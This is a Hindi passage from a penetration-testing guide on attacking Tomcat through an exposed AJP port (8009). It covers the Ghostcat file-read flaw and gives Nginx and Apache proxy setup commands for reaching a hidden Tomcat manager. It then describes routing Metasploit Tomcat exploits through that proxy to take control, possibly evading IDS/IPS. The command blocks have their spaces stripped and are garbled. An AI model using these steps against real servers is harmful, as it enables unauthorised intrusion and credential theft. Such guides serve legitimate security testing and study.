यदि AJP पोर्ट उजागर है, तो टॉमकैट भूतकट सुरक्षितता संक्रमित हो सकता है। यहाँ एक शोषण है जो इस समस्या के साथ काम करता है।
भूतकट एक LFI सुरक्षितता है, लेकिन कुछ हद तक प्रतिबंधित है: केवल एक निश्चित पथ से फ़ाइलें खींची जा सकती हैं। फिर भी, इसमें WEB-INF/web.xml जैसी फ़ाइलें शामिल हो सकती हैं जो टॉमकैट इंटरफ़ेस के लिए प्रमुख जानकारी जैसे क्रेडेंशियल लीक कर सकती हैं, सर्वर सेटअप पर निर्भर करता है।
सुधारित संस्करण 9.0.31 या उससे ऊपर, 8.5.51 और 7.0.100 इस समस्या को ठीक कर चुके हैं।
जब हमें एक खुला AJP प्रॉक्सी पोर्ट (8009 TCP) मिलता है, तो हम Nginx का उपयोग ajp_module के साथ कर सकते हैं ताकि "छिपा हुआ" टॉमकैट मैनेजर तक पहुंच सकें। इसे निम्नलिखित के रूप में किया जा सकता है:
Nginx स्रोत को डाउनलोड करें
आवश्यक मॉड्यूल को डाउनलोड करें
ajp_module के साथ Nginx स्रोत को कंपाइल करें।
AJP पोर्ट की ओर पोइंट करने वाली एक कॉन्फ़िगरेशन फ़ाइल बनाएं
# Download Nginx codewgethttps://nginx.org/download/nginx-1.21.3.tar.gztar-xzvfnginx-1.21.3.tar.gz# Compile Nginx source code with the ajp modulegitclonehttps://github.com/dvershinin/nginx_ajp_module.gitcdnginx-1.21.3sudoaptinstalllibpcre3-dev./configure --add-module=`pwd`/../nginx_ajp_module --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules
makesudomakeinstallnginx-V
बिना किसी अन्य पहुंचने वाले वेब पोर्ट के खुले पोर्ट 8009 का सामना करना दुर्लभ है। हालांकि, इसे Metasploit का उपयोग करके उत्पीड़ित किया जा सकता है। एपाच का उपयोग प्रॉक्सी के रूप में करके अनुरोध Tomcat पर पोर्ट 8009 पर पुनर्निर्देशित किए जा सकते हैं।
sudoapt-getinstalllibapache2-mod-jksudovim/etc/apache2/apache2.conf# append the following line to the configIncludeajp.confsudovim/etc/apache2/ajp.conf# create the following file, change HOST to the target addressProxyRequestsOff<Proxy *>Orderdeny,allowDenyfromallAllowfromlocalhost</Proxy>ProxyPass/ajp://HOST:8009/ProxyPassReverse/ajp://HOST:8009/sudoa2enmodproxy_httpsudoa2enmodproxy_ajpsudosystemctlrestartapache2
यह सेटअप IDS/IPS को छलने की संभावना प्रदान करता है क्योंकि AJP प्रोटोकॉल की बाइनरी प्रकृति है, हालांकि यह क्षमता सत्यापित नहीं है। 127.0.0.1:80 पर एक सामान्य Metasploit Tomcat दुरुपयोग को निर्देशित करके आप लक्षित सिस्टम पर नियंत्रण हासिल कर सकते हैं।